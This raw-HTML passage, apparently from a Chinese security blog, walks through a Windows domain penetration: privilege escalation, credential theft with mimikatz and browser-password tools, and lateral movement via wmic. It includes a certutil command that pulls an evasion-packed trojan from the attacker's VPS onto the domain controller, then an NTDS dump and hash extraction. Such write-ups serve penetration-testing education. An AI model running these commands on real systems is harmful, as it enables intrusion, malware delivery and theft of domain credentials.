data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001831" data-w="919" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.8433079434167573" src="https://wechat2rss.xlab.app/img-proxy/?k=700f7fba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IC2KEcHQibGDqickqPNPKjhhgBQdSM5M97suoQmh3pZPTk3tWcvf7Vl1A%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">查询域内用户
需要注意objectSid 这个字段，是这个与成员的SID可以配合mS-Ds-CreatorSID这个字段</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001832" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.44537037037037036" src="https://wechat2rss.xlab.app/img-proxy/?k=bd990701&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IRF4OkkPHxKHNym7W1z919klgHC3HANXecb7RibLUPwkxh52QUzv000Q%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">查询有mS-Ds-CreatorSID这个字段的机器</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">有mS-Ds-CreatorSID字段的机器说明是被域用户拉入域内，对应的SID值就是拉他们进域的域用户的SID值。而这个域用户就拥有这些机器的 基于资源的约束委派 的鉴权能力。就可以做基于资源的约束约束委派的攻击(RBCD)。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001837" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5175925925925926" src="https://wechat2rss.xlab.app/img-proxy/?k=3ca18645&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IWGgwr3b9nFu9ZGPYEKP7b4UHPVFM2QQZfZGWNUC2vhAoDXGI8t4VSA%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001835" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.4351851851851852" src="https://wechat2rss.xlab.app/img-proxy/?k=a5e17e5d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IFYkibkoE2EKotwFoevY6YT45DWk2PFfDovcFnloU4IeehP43X46q6zQ%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">4、收集本机密码凭证加提权。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1、查看本机权限加提权
whoami /all 可以看到当前用户令牌为低权令牌，之前在 LADP 里面查看域管理员的时候发现已经上线这台机器的域用户是域管理员，但是他的令牌不完整，缺少 dump hash 的特权。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001834" data-w="975" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.7128205128205128" src="https://wechat2rss.xlab.app/img-proxy/?k=e51e4426&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9Iu1L6caQYxkRsVNtKOWGibcYRuXXUIJRJXwm89eJGicn183f8hgBMUdcw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在CS中使用 命令 查看域里面的管理员<code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">net group &#34;domain admins&#34; /domain</code></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001836" data-w="900" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5955555555555555" src="https://wechat2rss.xlab.app/img-proxy/?k=6d82b7c7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IjlTlznOgmyevC6wVGCBYJnNP9rJjA0sfKmXLiawKaXeHm0ic8NYv4stA%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">现在需要做的就是Bypass UAC ，从低权令牌获取到高权令牌，获取到完整令牌。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">经过测试 使用 计划任务 成功Bypass UAC，获取到完整令牌。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001838" data-w="1045" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.7712918660287081" src="https://wechat2rss.xlab.app/img-proxy/?k=26bfedf9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IrxrFh0f1x01r8Bmh8N86439KX5w0cicdz4uEuc9f5s2VED8H0XS36bw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">再次 whoami /all 查看令牌，已经是完成的令牌。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">2、凭证密码收集：</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">获取凭证密码、hash 包括存在浏览器里面的密码也是收集的目标</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1、使用完整令牌的域管理员 进行 mimikzta dump 密码</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001843" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5435185185185185" src="https://wechat2rss.xlab.app/img-proxy/?k=203a326b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IBu3tqN0KQJ3e0qIca18YNFDgPELw4nyGF6amsy8qXxFmadnVnOvEmA%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">成功获取到hash</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">2、使用 BrowserGhost 获取存储在浏览器的密码</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001841" data-w="831" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.8580024067388689" src="https://wechat2rss.xlab.app/img-proxy/?k=93cf0946&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IOMcxkhfgNZibiaswLrqvQCiaMp7ojRiaoIPVE95At1ibSfzzy12sMWMjAyg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">2、内网横向</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">前面信息收集中获取了 域管理员的 hash、可横向的目标、域控的主机名与IP。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1、使用wmic 命令进行横向测试</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">使用 os get name 测试能否横向<code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">shell wmic /node:192.168.205.3 os get name</code></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001840" data-w="1028" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.6896887159533074" src="https://wechat2rss.xlab.app/img-proxy/?k=63efe436&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9ILzNu09Car5POZ7AfRzUpZMkt4klRxLgiaFBtpE3t6ibAR7icYNs9Q4duQ%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">2、测试能否出网</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">测试横向目标域控是否出网，如果出网可以使用反弹shell进行连接，如果不出网就需要使用正向连接。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">测试是否出网方法</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">第一种：使用 <code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">wmic /node:192.168.205.3 process call create &#34;cmd.exe /c ping 8.8.8.8 &gt; c:\1.txt&#34;</code></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">再使用 net use UNC 路径去读取保存ping 结果的文件</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">第二种:
在自己的vps 上面起一个监听</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">tcpdump -i 网卡 icmp</code></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">然后让目标主机去 ping 自己的vps</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在自己的vps上面查看是否有机器在ping 自己 判断是否出网</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这里我选择第二种</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001839" data-w="849" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.6819787985865724" src="https://wechat2rss.xlab.app/img-proxy/?k=e9ae151b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IIWDMGxMFsVerlez1kx1xgw6ib7hzh57az3zNjpQ2HqsKesZSHOmzLiaQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001842" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5787037037037037" src="https://wechat2rss.xlab.app/img-proxy/?k=0f40cbcc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IIWRZBTJGXsOic6GREGWdT3fkPhj8bZFB23qr1A5TQh0bicTh8bJmdnPg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">通过测试得知横向目标是可以出网的。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">3、测试横向目标是否有杀软</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">使用 process get processid,name 或者 tasklist /S hosename 查看横向目标所运行的服务进行判断是否有杀软。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">Tasklist  /S server2016 这个命令需要知道主机名</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">shell wmic /node:192.168.205.3 process get processid,name</code></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001845" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.7601851851851852" src="https://wechat2rss.xlab.app/img-proxy/?k=627b52b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IdsoJBl36ic9MTTknB3znOqPsZ8o2KbzLNgrhnamzhE1WgibNeQqZQKTQ%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">依旧是发现了杀软的进程，也就是无法直接使用powershell 进行横向，需要把免杀马放到域控上面，然后使用wmic执行命令。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">2、UNC共享（net use）</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">把本机的免杀马复制到域控上面。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">net use \\192.168.1.1\c$ &#34;admin@123&#34; /user:administrator</code></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001848" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.45092592592592595" src="https://wechat2rss.xlab.app/img-proxy/?k=83b67c98&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9Ia5ZxY8ammUtEM0cCTF1ic95aQQJEO1N4ia4a8VhMMgPlPsXpjDDCKyibw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">但是在使用 net use 命令的时候发现 无法使用</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001844" data-w="840" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.7345238095238096" src="https://wechat2rss.xlab.app/img-proxy/?k=094b7783&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9I2Ebc1ZibMNkJJcDB8jwpNAicZ3SVjbp9IcXDrCgD5ajos2cibGzxWc57Q%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">UNC 路径无法使用，之前考虑把免杀马复制过去的操作无法实现，现在的想法是 让域控去自己的vps 下载免杀马，然后再执行，使用WMIC命令之执行。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">3、wmic 下载文件、横向域控</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">wmic /node:xxx process call create &#34;cmd.exe /c certutil -urlcache -split -f <a href="http://xxx" target="_blank">http://xxx</a> C:\users\public\filename &#34;</code></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-fileid="100001861" data-galleryid="" data-ratio="0.4125523012552301" data-s="300,640" style="" data-type="png" data-w="1195" src="https://wechat2rss.xlab.app/img-proxy/?k=0818231d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9I3uicve4re9VvkPSRTUTmqgUlnoHXMCojpL047SDRpNSiaibDS0jViaPwwA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这个操作需要知道存放文件的绝对路径，windows  基本都会有的路径C:\Users\Public<br/></p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">经过操作域控成功上线。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001846" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.7314814814814815" src="https://wechat2rss.xlab.app/img-proxy/?k=b83818e0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IGYibvLlVuibV2KDsN4c9fvCplzhePlHu6MibuKTU8NoxegZDgmc6YcJfA%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001851" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.337037037037037" src="https://wechat2rss.xlab.app/img-proxy/?k=ef28cdc6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9ImlJo62wl2Wk1jeLpUlj8hBr7icmgLWEu6yBojdnIIkf0YC24yO2oOFw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1、dump NTDS</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">到域控以后先把 NTDS dump 下来，这个里面存储所有域用户的hash</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">powershell ntdsutil &#34;activate instance ntds&#34; ifm &#34;create full C:\Users\Public\ntdsutil&#34; quit quit</code></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001850" data-w="839" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.8545887961859356" src="https://wechat2rss.xlab.app/img-proxy/?k=131eab53&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IJYOHd6V6neFnm1zMCTg38pyxWnxHkCEV0t1WEhCN1j1H79rYuCl83Q%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001849" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.7231481481481481" src="https://wechat2rss.xlab.app/img-proxy/?k=1035bb3d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IlotibPuAXJSrH6rjZLGltovBYT4umxejdAabl2Zk34biadP3r9CtWRYA%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001852" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.6907407407407408" src="https://wechat2rss.xlab.app/img-proxy/?k=4ce509fd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IngPGU7Pk0kicqaunSpiaHyOEAzWjS6J5ZXbDGDiblsOLt85CMIRlgROjw%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001853" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5324074074074074" src="https://wechat2rss.xlab.app/img-proxy/?k=7eeb5ce5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IU6zjtURvyYJbia1dUPxRdMPS30uzR03tHMcmfGSCkMsIeu8xgibnnUrQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001856" data-w="752" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.6343085106382979" src="https://wechat2rss.xlab.app/img-proxy/?k=cef463c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IE1QIkibSBdvEPGVKJDxEM3MDQpvWyoH1edwKTvmLicIBicnjTe7aDMiarw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">2、解密NTDS</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">把NTDS 下载到本地之后 使用 impact 工具包 把hash 跑出来</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">python secretsdump.py -ntds &#34;C:\Users\xxx\Desktop\nt\ntds.dit&#34; -security &#34;C:\Users\xxx\Desktop\nt\SECURITY&#34; -system &#34;C:\Users\xxx\Desktop\nt\SYSTEM&#34; local</code></p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001857" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5564814814814815" src="https://wechat2rss.xlab.app/img-proxy/?k=f260ca45&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEI545EpVlNV4Y9AHEvVs9IWIoMEPF0r5DYOTQXz5XL3RbKyQia4GOUmSALL3czCuBpy11T7PhOicMQ%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">找到 krbtgt 用户的hash 是做黄金票据的根本，拥有了所有域用户的hash ，可以制作白银票据，不经过域控就就可以登录到想要的目标，而且不会在域控下留下日志文件。因为当前网段只有 当前落脚点和域控开机，其他电脑都是关机状态，本次的域渗透也到此结束了。</p></section><p><br/></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="outline: 0px;max-width: 100%;color: rgb(255, 0, 0);font-size: 30px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></span></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="outline: 0px;max-width: 100%;color: rgb(255, 0, 0);font-size: 30px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">号外</strong></span></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><br style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"/></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485360&amp;idx=2&amp;sn=8c768c88229b7ffd62609cd600bc0224&amp;chksm=fa8b1a28cdfc933e11a5ebcaac646ec704a9314f052a1cf32a143d4a1eeaebc17fdc3616ae55&amp;scene=21#wechat_redirect" data-itemshowtype="0" tab="innerlink" data-linktype="2" wah-hotarea="click" style="outline: 0px;color: rgb(255, 0, 0);-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">宽字节第二期线下培训开始招生啦！！！</strong></span></a></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><br style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"/></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><a target="_blank" 